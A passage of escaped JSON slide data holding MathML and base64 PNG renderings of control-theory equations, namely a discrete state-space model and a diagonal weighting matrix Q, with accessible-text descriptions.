close=\\\&quot;]\\\&quot;&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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PjAwMjg8L21uPjwvbXJvdz48L21mZW5jZWQ+PG1pPng8L21pPjxtZmVuY2VkIGNsb3NlPSJdIiBvcGVuPSJbIj48bWk+azwvbWk+PC9tZmVuY2VkPjxtbz4mI3hBMDs8L21vPjxtbz4rPC9tbz48bW8+JiN4QTA7PC9tbz48bWZlbmNlZCBjbG9zZT0iXSIgb3Blbj0iWyI+PG1yb3c+PG1uPjA8L21uPjxtbz4uPC9tbz48bW4+MDY0ODwvbW4+PG1vPiYjeEEwOzwvbW8+PG1uPjA8L21uPjxtbz4uPC9tbz48bW4+MDU3MzwvbW4+PC9tcm93PjwvbWZlbmNlZD48bWk+dTwvbWk+PG1mZW5jZWQgY2xvc2U9Il0iIG9wZW49IlsiPjxtaT5rPC9taT48L21mZW5jZWQ+PG1vPiw8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtaT55PC9taT48bWZlbmNlZCBjbG9zZT0iXSIgb3Blbj0iWyI+PG1pPms8L21pPjwvbWZlbmNlZD48bW8+JiN4QTA7PC9tbz48bW8+PTwvbW8+PG1vPiYjeDIwMDk7PC9tbz48bWk+eDwvbWk+PG1mZW5jZWQgY2xvc2U9Il0iIG9wZW49IlsiPjxtaT5rPC9taT48L21mZW5jZWQ+PC9tc3R5bGU+PC9tYXRoPgDaLGsAAAAASUVORK5CYII=\&quot;,\&quot;slideId\&quot;:300,\&quot;accessibleText\&quot;:\&quot;x open square brackets k plus 1 close square brackets space equals thin space open square brackets 1.0028 close square brackets x open square brackets k close square brackets space plus space open square brackets 0.0648 space 0.0573 close square brackets u open square brackets k close square brackets comma space space space y open square brackets k close square brackets space equals thin space x open square brackets k close square brackets\&quot;,\&quot;imageHeight\&quot;:11.565217391304348},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;Q&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mfrac&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mn&gt;100&lt;/mn&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;100&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;iVBORw0KGgoAAAANSUhEUgAAAvwAAAG4CAYAAAA5eTNoAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAABGJhU0UAAADwfZlgggAAJDRJREFUeNrt3Q+k1/f+B/CPI0eOI45JJjMySa65zHUlmcjkyiSSySSRJJOJzOSYjExmJiOZ5EpMMpkr5ppkZiSZazJyJUkiSXIkfr/32/d73G73fD+f9/ec7/fz9/HgbaNzvp/35/N5v97f5/l8P9/3J8uAqvxfDRoAsHRz3tMBgR8ABH7v6SDwmxwAQOD3ng4Cv8kBAAR+7+kg8JscAEDgBwR+AEDgBwR+AEDgBwR+ABD4vacDSYEfAEBuAIULAMgNgMIFAOQGQOECAHIDoHABALkBULgAgNwAClfhAgByAyhcKM1MaMdDO+1QAMgNgMKlPVaENhva0/4YfOKQAMgNgMKl+aZDOxba41fGoMAPIDcACpcGmwrt09AeDRiDAj+A3AAoXBpoeWhHQntYMAYFfgC5AVC4NMhkaB+Hdj9h/An8AHIDoHBpiGWhHR4i6Av8AHIDoHBpgInQDoV2d8igL/ADyA2AwqXmQf9AaHf6Y+lFaNdCOxPaydB+FvgB5AZA4dJcv/fH0PXQPgpt5QI/863ADyA3AAqXZooPz1pf8DOrBH4AuQFQuLTb7wI/gNwAKFza63uBH0BuABQu7XVJ4AeQGwCFi8APgNwAKFwEfgDkBkDhIvADIDeAwlW4CPwAyA2gcEHgB5Ab5AZQuCDwA8gNgMJF4Bf4AeQGQOEi8AMgNwAKF4EfALkBFK7CReAHQG4AhQsCP4DcIDeAwgWBH0BuABQuCPwAcgOgcBH4BX4AuQFQuAj8AMgNgMJF4AdAbgCFq3AR+AGQG0DhgsAPIDfIDaBwQeAHkBsAhYvAL/ADyA2AwkXgB0BuABQuAj8AcgOgcBH4AZAbQOGCwA+A3AAKFwR+ALkBULgg8APIDYDCReAX+AHkBkDhIvADIDcACheBHwC5ARSuwkXgB0BuAIULAj+A3CA3gMIFgR9AbgAULgj8AHIDoHAR+AGQGwCFi8APgNwAKFwEfgDkBlC4CheBHwC5ARQuCPwAcoPcAAoXBH4AuQFQuAj8Aj+A3AAoXAR+AOQGQOEi8AMgNwAKF4EfALkBFC4I/ADIDaBwQeAHkBsAhQsvuSzwA8gNgMKlvW4J/AByA6Bwaaep0F4UjMH47xMOFYDcAChcmmdfwhiMbbNDBSA3AAqXZpkO7XZi4P/R4QKQGwCFS3OsCu1qYtifb6cyt/YAyA2AwqW2ZkLb1g/uT4cM+/Pt36HNhvZeaJMOKYDcAChcqrMxtPuhPQptbpEBv6jN9V8/bmenQw4gNwAKl/JsGVPIH9Q+dMgB5AZA4QIAcgMoXIULAMgNoHABALlBbgCFCwDIDYDCBQDkBkDhAgByA6BwAVic9aF9FNr50K6H9jjrPfPieWjPQnsQ2qXQvsh6y+96ArbcIDeAwgWg5laEdjS0W9nwz8B4GNrnob3uMMoNDg8oXADqJwb9xznvA/Hffsx6V/vznpodr/4fy1zxlxsAhQtALawN7eaAuf9+aEdCW7XA770d2smc8H8jtDUOr9wAKFwAqrM1tCcD5v3Loc0kvEYM9b8OeI1HoW1ymOUGQOECUL5dob0YMOefG/K1lod2JRt8i89mh1tuABQuAOXZnjPfX13ka06H9tuA14yfIrzjsMsNgMIFYPw2ZL2r7gvN9U9DW72E116X9ZbtXOi174W20uGXGwCFC8D4xMB9P2euPzqCbRzPef0rToHcAChcAMbnh5x5Pv4hsHwE24i39uQt77nfaZAbAIULwOh9UDDPz45wWydythNX7nnN6ZAbAIULwOjEK/d3c+b4uFrP6hFu782C95TTToncAChcAEbnk4I5/p9j2ObVgj8w1jotcgOgcAFYumWhPSiY4w+MYbuHCrZ5xqmRGwCFC8DS7U2Y41ePYbtvFWwzLt+5yumRGwCFC8DSXCuY32+Pcdt3CrZ9zOmRGwCFC8DivZEwv58b4/bPF2z7D6dIbgAULgCLV3QffWx7xrj9/Qnb/4vTJDcACheAxb